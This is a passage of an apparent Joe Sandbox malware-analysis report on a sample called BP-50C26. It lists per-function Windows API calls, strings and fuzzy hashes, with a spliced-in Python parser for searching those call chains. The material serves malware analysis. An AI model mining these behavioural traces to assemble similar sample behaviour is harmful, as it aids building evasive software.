                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00C805C6
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C80601
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: f940ea153e14d63a6cdbed656b53ceaca50c7a4fca16b47b449b80d11740c85b
                                                                                      • Instruction ID: 7ed307e476e188b329eae23dac8ed575e7ae2da17bc22abcffd59783f08d3018
                                                                                      • Opcode Fuzzy Hash: f940ea153e14d63a6cdbed656b53ceaca50c7a4fca16b47b449b80d11740c85b
                                                                                      • Instruction Fuzzy Hash: 2E217F755003059FDB60AF698C44B9A77E4AF96729F300B19FCB1E72E0E7709964CB28
                                                                                      APIs
                                                                                        • Part of subcall function 00C1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C1604C
                                                                                        • Part of subcall function 00C1600E: GetStockObject.GDI32(00000011), ref: 00C16060
                                                                                        • Part of subcall function 00C1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C1606A
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CA4112
                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CA411F
                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CA412A
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CA4139
                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CA4145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                      • String ID: Msctls_Progress32
                                                                                      • API String ID: 1025951953-3636473452
                                                                                      • Opcode ID: 6ad7bb5f6e882fa5db2e689409164c9dfcaad99c42a02da9d58b02e4d00c91f1
                                                                                      • Instruction ID: ba8b3d0913f3e47db2225d08c9b001e1bb1d527a8f9c040e4155fbdbefc9d641
                                                                                      • Opcode Fuzzy Hash: 6ad7bb5f6e882fa5db2e689409164c9dfcaad99c42a02da9d58b02e4d00c91f1
                                                                                      • Instruction Fuzzy Hash: 2F1186B115011A7EEF119F64CC85EEB7F5DEF09798F014111FB18A6150C672DC61DBA4
                                                                                      APIs
                                                                                        • Part of subcall function 00C4D7A3: _free.LIBCMT ref: 00C4D7CC
                                                                                      • _free.LIBCMT ref: 00C4D82D
                                                                                        • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
                                                                                        • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
                                                                                      • _free.LIBCMT ref: 00C4D838
                                                                                      • _free.LIBCMT ref: 00C4D843
                                                                                      • _free.LIBCMT ref: 00C4D897
                                                                                      • _free.LIBCMT ref: 00C4D8A2
                                                                                      • _free.LIBCMT ref: 00C4D8AD
                                                                                      • _free.LIBCMT ref: 00C4D8B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction ID: c5d0dc2b14f6a00394a91677fa80e57b9e5fcfa1156ee0aaeca74245a117bbc9
                                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction Fuzzy Hash: 59115B71940B04ABEA21BFB1CC47FCB7BDCBF10700F800825B69AE6292DA75B505A660
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C7DA74
                                                                                      • LoadStringW.USER32(00000000), ref: 00C7DA7B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7DA91
                                                                                      • LoadStringW.USER32(00000000), ref: 00C7DA98
                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7DADC
                                                                                      Strings
                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00C7DAB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                      • API String ID: 4072794657-3128320259
                                                                                      • Opcode ID: bb1a78ba709b76baa6a73d4b5b437dd537c3f340a985b011039ca16d84eadf34
                                                                                      • Instruction ID: ea472d6e6f16dd1ee9c5ca5e881259c88919a6e4a409d05420a88f35a30d4fda
                                                                                      • Opcode Fuzzy Hash: bb1a78ba709b76baa6a73d4b5b437dd537c3f340a985b011039ca16d84eadf34
                                                                                      • Instruction Fuzzy Hash: C1014FF25002087BE710DBA09DC9FEA726CEB09705F404496B70AE3041EA749E848B74
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(0124E1C8,0124E1C8), ref: 00C8097B
                                                                                      • EnterCriticalSection.KERNEL32(0124E1A8,00000000), ref: 00C8098D
                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C8099B
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C809A9
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C809B8
                                                                                      • InterlockedExchange.KERNEL32(0124E1C8,000001F6), ref: 00C809C8
                                                                                      • LeaveCriticalSection.KERNEL32(0124E1A8), ref: 00C809CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 3495660284-0
                                                                                      • Opcode ID: 4da88825e253aab746a1c339b4746d3066cc485b6f352a0703810abe80a005e5
                                                                                      • Instruction ID: 2dc40fe32902d32fc681ecf536aa1ebef526f413371b957bfcaf551ff57c2427
                                                                                      • Opcode Fuzzy Hash: 4da88825e253aab746a1c339b4746d3066cc485b6f352a0703810abe80a005e5
                                                                                      • Instruction Fuzzy Hash: A0F03C32542A02BBD7415FA4EECCBDABB39FF0270AF502125F202928A1CB749575CF94
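The function records in this part of the report all follow one fixed layout (an APIs block, an optional Strings block, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity). The Python below is an added example, not code from Joe Sandbox or from this report: it parses records in that layout into objects, strips the "Download File" link text that the HTML export fuses onto the Associated lines, and searches each function's direct API call sequence for an ordered chain, here the TerminateThread, WaitForSingleObject, CloseHandle chain of the record at 00C8097B above. SAMPLE is a constructed input made of three records from this page, abridged to a few lines each; the regular expressions assume the line formats visible here and are an assumption for any other report layout.

```python
"""Parse Joe Sandbox per-function API listings into searchable records (added example)."""
import re
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"   # link text the HTML export fuses onto "Associated:" lines

# "• Name.MODULE(args), ref: ADDR", "• _free.LIBCMT ref: ADDR" (no args) and
# "• Part of subcall function CALLER: Name.MODULE(args), ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
STRING_RE = re.compile(r"^•\s*(?P<s>.*), xrefs: (?P<ref>[0-9A-F]{8})$")   # "• <string>, xrefs: ADDR"
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")                              # "• Key: value"


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""   # caller address when the line reads "Part of subcall function X"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (string, xref) pairs
    dumps: list = field(default_factory=list)     # "Associated" memory dumps, residue stripped
    meta: dict = field(default_factory=dict)      # Source File, Opcode ID, fuzzy hashes, ...

    def direct_calls(self):
        # APIs the function calls itself, in listing order; subcall lines are excluded
        return [c.name for c in self.apis if not c.subcall_of]


def parse_function_records(text):
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                     # the export indents every line heavily
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":                 # every record opens with its APIs block
                rec = FunctionRecord()
                records.append(rec)
            continue
        if rec is None or not line.startswith("•"):
            continue                           # page noise, or a record cut off at the top
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] or ""))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                rec.strings.append((m["s"], m["ref"]))
        else:
            m = KV_RE.match(line)
            if not m:
                continue
            key, value = m[1].strip(), m[2].strip()
            if key == "Associated":
                rec.dumps.append(value[:-len(LINK_RESIDUE)].strip() if value.endswith(LINK_RESIDUE) else value)
            else:
                rec.meta[key] = value
    return records


def calls_in_order(rec, pattern):
    """True if the record's direct calls contain `pattern` as an ordered subsequence."""
    it = iter(rec.direct_calls())
    return all(any(call == want for call in it) for want in pattern)


def find_functions(records, pattern):
    """(Opcode ID, direct call list) for every record whose call chain matches `pattern`."""
    return [(r.meta.get("Opcode ID"), r.direct_calls()) for r in records if calls_in_order(r, pattern)]


# Constructed sample: three records from this report, abridged to a few lines each.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C7DA74
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00C7DAB9
Similarity
• Opcode ID: bb1a78ba709b76baa6a73d4b5b437dd537c3f340a985b011039ca16d84eadf34
APIs
  • Part of subcall function 00C4D7A3: _free.LIBCMT ref: 00C4D7CC
• _free.LIBCMT ref: 00C4D82D
  • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1), ref: 00C429DE
Similarity
• Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
APIs
• EnterCriticalSection.KERNEL32(0124E1A8,00000000), ref: 00C8098D
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00C8099B
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C809A9
• CloseHandle.KERNEL32(00000000), ref: 00C809B8
• LeaveCriticalSection.KERNEL32(0124E1A8), ref: 00C809CF
Memory Dump Source
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp Download File
Similarity
• Opcode ID: 4da88825e253aab746a1c339b4746d3066cc485b6f352a0703810abe80a005e5
"""
```

Calling `find_functions(parse_function_records(SAMPLE), ["TerminateThread", "WaitForSingleObject", "CloseHandle"])` returns only the third record, keyed by its Opcode ID, which is the value to pivot on when comparing the same function across reports of different samples; the Instruction Fuzzy Hash and API String ID land in `meta` for the same purpose.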
                                                                                      APIs
                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C91DC0
                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C91DE1
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91DF2
                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00C91EDB
                                                                                      • inet_ntoa.WSOCK32(?), ref: 00C91E8C
                                                                                        • Part of subcall function 00C739E8: _strlen.LIBCMT ref: 00C739F2
                                                                                        • Part of subcall function 00C93224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C8EC0C), ref: 00C93240
                                                                                      • _strlen.LIBCMT ref: 00C91F35
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                      • String ID:
                                                                                      • API String ID: 3203458085-0
                                                                                      • Opcode ID: 24e150dd72daa2498e62577c37e6f6b957bb80878c6c16947f8e459ffcc25412
                                                                                      • Instruction ID: c1880d1b6383e38a6bce40b2d17b69b16cfdae4079a4551d0e2533be3612491b
                                                                                      • Opcode Fuzzy Hash: 24e150dd72daa2498e62577c37e6f6b957bb80878c6c16947f8e459ffcc25412
                                                                                      • Instruction Fuzzy Hash: 4DB11531204341AFC724DF64C89AF6A77E5AF85318F58854CF8664B2E2DB31EE42DB91
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 00C15D30
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C15D71
                                                                                      • ScreenToClient.USER32(?,?), ref: 00C15D99
                                                                                      • GetClientRect.USER32(?,?), ref: 00C15ED7
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C15EF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                      • String ID:
                                                                                      • API String ID: 1296646539-0
                                                                                      • Opcode ID: c2096b0522782e0d5e3dc38332a6e9b3943c77f8a67c2ab60cab734128e3122b
                                                                                      • Instruction ID: 4171e58a5bca64fc30b6d54900d56ef02f72ccb2661aeaa7f932ddbed1129948
                                                                                      • Opcode Fuzzy Hash: c2096b0522782e0d5e3dc38332a6e9b3943c77f8a67c2ab60cab734128e3122b
                                                                                      • Instruction Fuzzy Hash: 15B17A78A00A4ADBDB14CFA9C4807EEB7F1FF49314F14841AE8A9D7250DB34AA91DB54
                                                                                      APIs
                                                                                      • __allrem.LIBCMT ref: 00C400BA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C400D6
                                                                                      • __allrem.LIBCMT ref: 00C400ED
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C4010B
                                                                                      • __allrem.LIBCMT ref: 00C40122
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C40140
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1992179935-0
                                                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                      • Instruction ID: 4aaa9a8cb4931cb10da43ef37dbc1045fbbbb4af3b7bf2fd7cc240c55ce71b94
                                                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                      • Instruction Fuzzy Hash: 3F81F572A407069BE724AE69CC42B6F73E8BF55324F24493EFA21D7281E770DE419B50
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C382D9,00C382D9,?,?,?,00C4644F,00000001,00000001,8BE85006), ref: 00C46258
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C4644F,00000001,00000001,8BE85006,?,?,?), ref: 00C462DE
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C463D8
                                                                                      • __freea.LIBCMT ref: 00C463E5
                                                                                        • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      • __freea.LIBCMT ref: 00C463EE
                                                                                      • __freea.LIBCMT ref: 00C46413
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: 87545e721216235400a577f7e1301a8ac4174be23776b6df5a020829e1057a9c
                                                                                      • Instruction ID: b6a06c6f1ad50a1a51d698deab0a6b956828ddbd96378919e3391a7390e448c6
                                                                                      • Opcode Fuzzy Hash: 87545e721216235400a577f7e1301a8ac4174be23776b6df5a020829e1057a9c
                                                                                      • Instruction Fuzzy Hash: 55513172A00246ABEB258F60CC81FAF7BA9FF86710F144229FD15D7194EB34DD80D6A1
                                                                                      APIs
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                        • Part of subcall function 00C9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9B6AE,?,?), ref: 00C9C9B5
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9C9F1
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA68
                                                                                        • Part of subcall function 00C9C998: _wcslen.LIBCMT ref: 00C9CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9BCCA
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9BD25
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C9BD6A
                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C9BD99
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9BDF3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9BDFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                      • String ID:
                                                                                      • API String ID: 1120388591-0
                                                                                      • Opcode ID: 180b43a65ef71935005c9e2200332411f62ae51c5587b29c68f8862d9261e2bb
                                                                                      • Instruction ID: 8e9162ebd7cdb521720f0711c43c29f0a23ed51e3f777543fb9ea2a563b647f6
                                                                                      • Opcode Fuzzy Hash: 180b43a65ef71935005c9e2200332411f62ae51c5587b29c68f8862d9261e2bb
                                                                                      • Instruction Fuzzy Hash: 2181D031208241EFCB14DF24C999E6ABBE5FF85308F14855CF4594B2A2CB31EE45DB92
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00C6F7B9
                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00C6F860
                                                                                      • VariantCopy.OLEAUT32(00C6FA64,00000000), ref: 00C6F889
                                                                                      • VariantClear.OLEAUT32(00C6FA64), ref: 00C6F8AD
                                                                                      • VariantCopy.OLEAUT32(00C6FA64,00000000), ref: 00C6F8B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C6F8BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                      • String ID:
                                                                                      • API String ID: 3859894641-0
                                                                                      • Opcode ID: ed45701fd8d7eb6db11649324cf5acd400160da1fd07afd06385340028e5b6ea
                                                                                      • Instruction ID: 49f5afa76cdfa036bfbe3a1507b3bd40fea39def0ff8917f78671f13755a3da0
                                                                                      • Opcode Fuzzy Hash: ed45701fd8d7eb6db11649324cf5acd400160da1fd07afd06385340028e5b6ea
                                                                                      • Instruction Fuzzy Hash: A551D835500310BADF30AF66E8D5769B3A5EF46310F24546EE906DF291DB708C42DB56
                                                                                      APIs
                                                                                        • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00C894E5
                                                                                      • _wcslen.LIBCMT ref: 00C89506
                                                                                      • _wcslen.LIBCMT ref: 00C8952D
                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00C89585
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
